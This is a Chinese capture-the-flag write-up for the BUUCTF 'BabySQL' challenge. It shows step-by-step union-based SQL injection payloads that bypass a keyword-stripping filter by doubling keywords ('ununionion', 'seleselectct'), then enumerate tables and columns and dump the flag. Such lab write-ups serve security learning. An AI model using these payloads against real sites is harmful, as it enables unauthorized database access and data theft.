[极客大挑战 2019]BabySQL

环境

BUUCTF在线环境,启动靶机,获取链接。
http://58c49b6a-3eb5-4bb4-8037-e68e66f39616.node4.buuoj.cn:81

解题思路

访问链接,熟悉的页面。
在这里插入图片描述
老规矩,万能密码走一波。
在这里插入图片描述
不让登了,发现有做过滤。
看看过滤了什么,不闭合username的单引号,让它报错看看。
?username=admin'&password=admin'+or+'1'+='1
在这里插入图片描述
发现下面的关键词or不见了,试试双写看看。
?username=admin&password=admin'+oorr+'1'+='1
在这里插入图片描述
果然登进去了,所以这里的过滤是将关键词进行置空,我们可以通过双写绕过。
我们来模糊测试下过滤了什么关键词。
在这里插入图片描述
经测试select、or、union、from等被过滤置空。
构造payload报错当前显示的字段数。

?username=admin&password=admin'+ununionion seleselectct 1,2,3%23

在这里插入图片描述
爆出当前数据库名:

?username=admin&password=admin'+ununionion seleselectct 1,version(),database()%23

在这里插入图片描述
爆出表名:

?username=admin&password=admin' uniunionon seleselectct 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23

在这里插入图片描述
爆出字段:

?username=admin&password=admin' uniunionon seleselectct 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23

在这里插入图片描述
爆出表中的内容:(拿到flag)

?username=admin&password=admin' uniunionon seleselectct 1,2,group_concat(passwoorrd) frfromom b4bsql%23

在这里插入图片描述

总结

过滤了关键词,可以通过双写绕过。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值